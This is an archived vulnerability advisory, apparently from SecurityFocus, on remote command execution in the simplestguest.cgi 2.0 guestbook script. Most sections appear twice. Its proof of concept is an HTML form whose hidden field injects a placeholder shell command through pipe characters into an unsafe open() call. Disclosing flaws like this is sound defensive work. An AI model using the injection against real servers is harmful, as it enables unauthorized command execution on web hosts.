Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
BID:2106
Info
Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
| Bugtraq ID: | 2106 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0022 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2000 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | reported to bugtraq by [email protected] on Dec 14 2000. |
| Vulnerable: |
Leif M. Wright simplestguest.cgi 2.0 |
| Not Vulnerable: | |
Discussion
Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors.
An insecure call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privileges of the webserver.
A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors.
An insecure call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privileges of the webserver.
Exploit / POC
Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
The following example was submitted by scott <[email protected]>:
Make a html form similar to:
<form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <COMMAND> |">
                 <input type=hidden name="NAME" value="user">
                 <input type=submit>
</form>
The following example was submitted by scott <[email protected]>:
Make a html form similar to:
<form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <COMMAND> |">
                 <input type=hidden name="NAME" value="user">
                 <input type=submit>
</form>
Solution / Fix
Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
Solution:
Currently the SecurityFocus staff are not ware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not ware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability
References:
References: